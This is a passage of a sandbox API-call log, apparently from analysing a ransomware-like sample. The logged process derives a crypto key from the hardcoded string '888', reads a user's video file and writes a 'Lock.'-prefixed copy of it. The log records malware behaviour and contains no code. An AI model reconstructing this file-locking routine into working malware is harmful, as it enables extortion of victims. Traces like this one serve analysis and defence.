hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.906] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0214.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0214.906] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.906] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0214.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0214.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7180, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0214.907] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c6e8) returned 1 [0214.907] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0214.907] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0214.907] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.907] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.907] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0214.908] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0214.908] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.908] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.908] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.908] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.908] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.908] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.908] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.908] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.908] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.908] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab638, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0214.908] CryptCreateHash (in: hProv=0xa7c6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0214.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.908] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0214.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0214.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0214.908] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.909] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab6e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0214.909] CryptHashData (hHash=0x9e1eb8, pbData=0x2a71c08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0214.909] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.909] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.909] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.909] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0214.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab500, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0214.909] CryptDeriveKey (in: hProv=0xa7c6e8, Algid=0x6601, hBaseData=0x9e1eb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0214.909] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.909] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0214.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ea0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0214.909] CryptDestroyHash (hHash=0x9e1eb8) returned 1 [0214.910] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/X3KII9Ky2zq5leE1M.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\x3kii9ky2zq5lee1m.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0214.911] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.911] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0214.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0214.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0214.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0214.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0214.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b88 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.912] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b88 | out: hHeap=0x2af0000) returned 1 [0214.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0214.912] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.X3KII9Ky2zq5leE1M.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\lock.x3kii9ky2zq5lee1m.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0214.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0214.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0214.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0214.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0214.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0214.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0214.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0214.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0214.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0214.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ed020 [0214.918] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0214.918] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x5b7d, lpOverlapped=0x0) returned 1 [0214.920] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0214.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0214.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5b7d) returned 0x3867020 [0214.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ed020 | out: hHeap=0x2af0000) returned 1 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0214.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5b7d) returned 0x2a8a138 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0214.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5b7d) returned 0x3867020 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 